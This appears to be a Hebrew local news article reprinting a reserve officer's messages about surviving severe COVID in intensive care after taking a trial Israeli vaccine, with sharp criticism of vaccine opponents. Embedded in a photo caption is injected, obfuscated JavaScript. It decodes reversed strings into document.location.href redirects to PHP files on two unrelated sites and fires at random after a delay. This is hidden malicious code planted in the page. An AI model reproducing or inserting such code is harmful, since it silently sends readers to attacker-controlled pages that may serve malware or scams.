fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

מסמך: חולה קורונה קשה שעמד בפני המוות והחלים, מספר על התופת שעבר

קצין מילואים בפיקוד העורף שנדבק בוירוס בעת פעילותו למיגור הקורונה, מספר על שעבר עליו בטיפול נמרץ קורונה ועל כך שהחלים בנס היות והיה מחוסן
נגיף הקורונה | צילום: Shutterstock
צוות רפואי מטפל בחולה קורונה | צילום: Shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

באחת מהקבוצות בהן אני חבר, התקבלה השבוע הודעה של אחד מחברי הקבוצה חולה קורונה, שאני חייב להפיץ אותה ככל יכולתי כדי לחסוך חיים וכדי שאנשים יבינו כמה חשוב להתחסן, למרות שאני לא נוהג לפרסם באתר blinker.co.il כתבות שלמעשה נכתבו על ידי צד שלישי, החלטתי הפעם לפרסם את ההתכתבות עם חברי כלשונה.

להלן השתלשלות ההודעות שנכתבו ממיטת חוליו של הכותב כלשונן, ממליץ לקרוא את הדברים עד סופם, זה מסמך מדהים של חולה קורונה קשה, הישר מהתופת של מחלקת הקורונה. פרטי הכותב לא יפורסמו בשלב זה והם שמורים במערכת:

"חברים יקרים שלום ,
הרבה זמן לא השתתפתי בשיחות, כידוע עברתי לפני ארבעה חודשים להתגורר מחוץ לנהריה, אני רואה חובה מוסרית לפרסם את הקורה אותי:

מתחילת גל הקורונה הראשון אני מעורב בנושא מטעם פיקוד העורף באופן אינטנסיבי ומאסיבי,
בשנת 2020 עשיתי 175 ימי מילואים במקומות הצפופים והאדומים ביותר הקיימים כחלק מההתמודדות במגיפה וכך גם השנה אני בתוך המערבולת.

לעניין ועזבו פוליטיקות בצד – לא מעניין, התבקשתי השנה לקחת אחריות על העיר נצרת הערבית (קשיים רבים שם) וערב לפני ערב יום כיפור ביקרתי במתחם בדיקות שפתחנו שם בלחץ שלי.

לצערי שלחו פחות צוותי בדיקה מהדרוש והייתה צפיפות גדולה מאד, מה שגרם להדבקות שלי באותו מעמד בוירוס.

צום יום כיפור היה הצום הכי קשה שהיה לי בחיים ואחרי הצום אכלתי מעט ומאז לא יכולתי להכניס פרור לפה, על מנת לא להלעות, לאחר בדיקה ביתית ובדיקת PCR היה ברור שאני חולה קורונה עם הרגשה קשה של חוסר יציבות, כאבי ראש קשים ותחילת קשיי נשימה.

ביום שני 20/9 נדמה לי, אחרי תשובה חיובית של ה-pcr, התפניתי עצמאית למרכז הרפואי לגליל והתברר שמצבי קשה ביותר (90% מהריאות היו נגועות בוירוס) כלומר מצב של סרט מלחמה שרבים לצערנו לא שורדים אותו …

זו הפעם הראשונה בחיי שאני לא מצליח לנשום בכוחות עצמי וזאת הפעם הראשונה שלי להתאשפז בטיפול נמרץ.

הרופאה הרוסיה (מדגיש כי אשתי רוסיה ואני מכיר קצת את המנטליות) מסתכלת עלי במבט שאני יכול לראות את הבעת העיניים וכרופאה אומרת נתפלל שתפילותינו ייענו… קשה להסביר את ההרגשה …

קיבלתי פלאזמות , סטרואידים , הנשמה וים תרופות, נלחמו עליי בכל כוחותיהם, במסירות גדולה ולא ויתרו, כפי שנוהגים כאן עם כולם.

נשאלתי לגבי החיסון,  אני בחרתי להיות נסיין של החיסון מבית המכון הביולוגי, כך שלא ידעתי או יכולתי להכיר את יעילותו במקרה שלי אבל כמובן שזה ייבדק בעתיד וישמש כ-Taet Case.

עברתי עשרה ימים קשים מאד בטיפול נמרץ ולשמחתי עם המון תפילות אמונה ותמיכה של המשפחה, הצבא ועוד, אני במגמת שיפור בריאות וכתוצאה מכך בנשימה וברוך השם נראה שיצאתי מכלל סכנה ואני בדרך להחלמה.

מכאן לחיסונים: מתחייב לכם בכל ליבי, עיקר אלו שסופגים פגיעה חמורה וברובם לא מתאוששים הם הלא מחוסנים, החיסונים קריטיים להצלת חיים ומי שלא עבר את מה שעברתי לא יבין.

שרה(ק.ה. חברה בקבוצה אוהדת ליכוד) יודעת שאני לא חסיד של ביבי, אבל אני מכיר ביכולותיו ובכשרונותיו ולכל מי שאני מכיר אמרתי: אם ביבי הראשון שעשה את הבוסטר, תאמינו לו הוא מכיר את הפרטים יותר טוב מכולם.

מתנגדי החיסונים פוגעים בבריאות הציבור, עם שטיפות מוח שהם עוברים ע״י גורמים לא מוסמכים, עד כדי חולי נפש.

נ.ק. כותבת לי: "אני חוקרת אני יודעת שהחיסון = חיסול" וש.ק. עוד גאון שחי בלה לה לנד מתלהב.

אם זה תלוי בי, הייתי דואג לאמת את האנשים המפיצים מידעים לא מבוססים ואפילו שיקריים ואם לא היה ביכולתם לבסס את דבריהם שישבו בכלא – אנשים מתים !!!

בכל מקרה אני בדעה שמי שלא רוצה להתחסן שלא יתחסן, אבל שיקפיד על הכללים ולא יסית ויפגע בבריאות הציבור".

ממשיך חברי: "ברוך השם אני מרגיש טוב יותר למזלי, עדיין בטיפול נמרץ נשימתי קורונה, אבל עם פחות חמצן ולאט לאט מסתדר בעצמי (עדיין יש עוד דרך).

מאמין ששבוע הבא אעבור למחלקה לחולי קורונה קלים יותר ואולי אשתחרר להמשך החלמה בבית, אבל מדובר במחלה ארורה ומתעתעת, אז אני משתדל להיות זהיר בלשוני ולא להכנס לאופוריה".

פורסם ב'ערוץ 12' : מתוצאות ראשוניות שהתקבלו בשלב השני של הניסוי בחיסון הישראלי לקורונה, עולה כי יותר מ-80% מהמתנדבים שקיבלו את המינון המקסימלי – פיתחו נוגדנים.

ממשיך חברי: "זה ככל הנראה היה המזל שלי, היות וקיבלתי את שני החיסונים עם המינון המקסימאלי, אבל בהמשך יבדקו את הקשר כי עדיין מדובר בחיסון בשלבי נסיון.

המכון הביולוגי מכון קטן הכפוף למשרד הבטחון ותחום עיסוקו במלחמה ביולוגית, מועסקים בו כ-300 עובדים עם תקציבים לא בשמיים, כלשם השוואה בפייזר עובדים כ-90000 עובדים עם תקציבים של מיליארדים.

בתחילת המגיפה ככל שזכור לי נתניהו הקציב סכום של 140 מליון ש״ח לפיתוח, התהליך התמהמה אבל אני בחרתי להאמין למוח היהודי ובטח שבעת הצלחה, המדינה הייתה זוכה להכנסות עתק.

בכל מקרה אני עדיין מאמין שהחיסון הישראלי יהיה חלק מהחיסונים שאושרו למרות העיכובים בניסוי ההמונים.

לשאלת אחת מחברות הקבוצה לשלומו, עונה חברי: "תודה, לשמחתי אני מתחזק וחוזר לעצמי, היום / מחר אני אשתחרר ככל הנראה ממחלקת טיפול נמרץ למחלקה לחולים קלים יותר ומשם הדרך הביתה מתקצרת לקראת החלמה בהדרגה 🙏.

היה לי נס גדול , ועכשיו גם ברור שנוגדני החיסון עזרו לי בין היתר לשרוד, לצערי היום כאשר שאלתי על חולה קורונה מעכו ששכב סמוך אלי בחדר ומצבו לא היה חמור משלי, אבל הוא לא היה מחוסן,  נמסר לי שלא החזיק מעמד ונפטר".

התכתבות בוואטסאפ עם חבר שלו מהצבא:

מבקש חברי: "לכו ספרו לק., נ.ק., ג. ש. (חוצפנית ברמות ומנוולת עם פה גדול ), ע. וש. ל. מ.(ק.ה. המתנגדים למתן החיסונים), ההזויים שלא מוכנים לבוא פעם אחת ולהתנדב כאן במחלקת טיפול נמרץ נשימתי ולראות בעיניהם את הנתונים ומי הם חולי הקורונה שלא שורדים".

לסיכום לאחר שקראתי את דברי חברי ופרסמתי אותם כלשונם, אומר לכם: אל תתנו למתנגדי החיסונים להבהיל אתכם, אמנם הגל הרביעי בירידה, אבל עדיין נדבקים והמגפה לא עושה רושם שעומדת לנטוש אותנו.

 

 

 

לחדשות נוספות בחדשות נהריה וצפון 1 הקליקו כאן* לדף הפייסבוק שלנו הקליקו כאן*

 

 

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות